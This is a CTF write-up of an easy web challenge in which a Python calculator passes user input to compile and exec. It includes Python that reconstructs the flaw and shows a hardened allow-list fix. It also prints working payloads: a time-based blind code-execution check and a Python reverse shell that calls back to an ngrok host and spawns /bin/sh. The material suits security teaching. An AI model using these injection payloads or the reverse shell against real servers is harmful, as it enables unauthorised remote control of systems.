Obligatory Calc

NYP InfoSec December CTF 2022 (authored challenge)

| Difficulty | Points | Solves |
|------------|--------|--------|
| Easy       | 147    | 10     |

Description

In every CTF that I've seen
There's always a calculator routine
It tests our skills and our wit
To solve it, we must not quit

Poem by ChatGPT

The web application receives user input from a POST request, then uses the compile function to generate a code object from the string that represents the arithmetic operation.

The code object is then executed using the exec function, and the result is stored in a dictionary called msg.

Because compile and exec run whatever source text is assembled from the user-controlled operands and operator, an attacker can inject arbitrary Python into the operator field and have the server execute it.
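The following is an added Python example, not the challenge's source: a reconstruction of the compile/exec pattern the description refers to, placed beside a hardened version that never turns user text into code. The function names, the `msg['result']` assignment and the use of `math.factorial` as a side-effect-free stand-in for `os.system` are my assumptions.

```python
import operator as op

# Reconstruction of the challenge's calculator pattern (assumption: the
# original wired the three form fields straight into compile()/exec();
# the function names here are mine, not the challenge's).
def vulnerable_calc(int1: str, operator_: str, int2: str):
    """Concatenates the POST fields into Python source, compiles it,
    exec()s it, and reads the result back out of the msg dictionary."""
    msg = {}
    source = f"msg['result'] = {int1}{operator_}{int2}"
    code = compile(source, "<calc>", "exec")
    exec(code, {"msg": msg})  # exec adds __builtins__, so __import__ is reachable
    return msg["result"]


# Hardened form: parse operands as integers and dispatch the operator
# through an explicit allow-list, so no user text ever becomes source.
ALLOWED_OPS = {"+": op.add, "-": op.sub, "*": op.mul, "/": op.truediv}


def safe_calc(int1: str, operator_: str, int2: str):
    try:
        a, b = int(int1), int(int2)
    except ValueError as exc:
        raise ValueError("operands must be integers") from exc
    fn = ALLOWED_OPS.get(operator_)
    if fn is None:
        raise ValueError(f"operator {operator_!r} not allowed")
    if fn is op.truediv and b == 0:
        raise ValueError("division by zero")
    return fn(a, b)


def is_rejected(int1: str, operator_: str, int2: str) -> bool:
    """True if safe_calc refuses the input instead of evaluating it."""
    try:
        safe_calc(int1, operator_, int2)
    except ValueError:
        return True
    return False


# Injected "operator" in the writeup's shape: the trailing # comments out
# int2, and __import__ pulls in a module the calculator never meant to
# expose. math.factorial replaces os.system so the demo has no side effects.
INJECTED_OPERATOR = "*0+__import__('math').factorial(5)#"

if __name__ == "__main__":
    print(vulnerable_calc("1", "+", "1"))                # 2
    print(vulnerable_calc("1", INJECTED_OPERATOR, "1"))  # 120: injected call ran
    print(safe_calc("1", "+", "1"))                      # 2
    print(is_rejected("1", INJECTED_OPERATOR, "1"))      # True
```

Stripping `__builtins__` from the exec globals is not a fix: the object graph reachable from a literal (`().__class__.__base__.__subclasses__()`) still leads to dangerous classes. The only robust repair is the allow-list dispatch above, which never compiles user input.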

Exploiting the vulnerability

Using Burp Suite, I intercepted the request and sent it to Repeater with Ctrl + R.

Next, I modified the body int1=1&operator=%2B&int2=1 into a payload that performs blind code execution; the trailing # comments out whatever the server appends for int2:

int1=1&operator=*__import__('os').system('python -c "import time;time.sleep(5)"')#&int2=1

The web application sleeps for 5 seconds before returning 0 (os.system returns the exit status 0, and 1*0 evaluates to 0), which confirms that the injected code is executed.

Modify the payload to a standard Python reverse shell. The single quote that closes the -c argument is separated from Python's closing ''' by a space so the tokenizer does not see four consecutive quotes:

int1=1&operator=*__import__('os').system('''python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.tcp.ngrok.io",18531));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ''')#&int2=1

We have successfully shelled the server and gotten the flag.
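To make the steps above reproducible outside Burp, here is an added Python example (not from the writeup) that encodes an operator payload into an application/x-www-form-urlencoded body the way Repeater or curl needs it, shows what the server decodes (including the %2B of the original body), and runs the time-based confirmation against a local reconstruction of the compile/exec handler. The handler, the field names and the 0.3 s delay are assumptions; the sleep-based check is the writeup's, shortened so it runs quickly and without spawning a process.

```python
import time
from urllib.parse import parse_qs, urlencode

# Body as the writeup shows it in Repeater (only '+' was percent-encoded).
ORIGINAL_BODY = "int1=1&operator=%2B&int2=1"


def parse_form_body(body: str) -> dict:
    """What a form-decoding server sees: one value per field, percent-decoded."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}


def build_form_body(operator_payload: str, int1: str = "1", int2: str = "1") -> str:
    """Encode a payload so '+', '#', '&', quotes and spaces survive transport
    (paste into Repeater, or pass to curl --data)."""
    return urlencode({"int1": int1, "operator": operator_payload, "int2": int2})


def calc_handler(form: dict):
    """Local stand-in for the vulnerable endpoint: same compile/exec pattern
    as the challenge (reconstruction, not the challenge's own source)."""
    msg = {}
    source = f"msg['result'] = {form['int1']}{form['operator']}{form['int2']}"
    exec(compile(source, "<calc>", "exec"), {"msg": msg})
    return msg["result"]


def blind_probe(handler, body: str, delay: float):
    """Time-based confirmation of code execution: submit a payload that sleeps
    and compare the wall-clock time against the expected delay.
    Returns (result, elapsed_seconds, confirmed)."""
    t0 = time.perf_counter()
    result = handler(parse_form_body(body))
    elapsed = time.perf_counter() - t0
    return result, elapsed, elapsed >= delay


# Sleep payload in the writeup's shape. time.sleep returns None, so `or 0`
# stands in for os.system's exit status and the expression is still 1*0 == 0.
DELAY = 0.3
SLEEP_OPERATOR = f"*(__import__('time').sleep({DELAY}) or 0)#"

if __name__ == "__main__":
    print(parse_form_body(ORIGINAL_BODY))       # {'int1': '1', 'operator': '+', 'int2': '1'}
    body = build_form_body(SLEEP_OPERATOR)
    print(body)                                 # fully percent-encoded payload
    print(blind_probe(calc_handler, body, DELAY))  # (0, ~0.3, True)
```

A benign operator such as `+` returns immediately, so the same probe reports `confirmed == False`; the delay, not the returned 0, is the oracle.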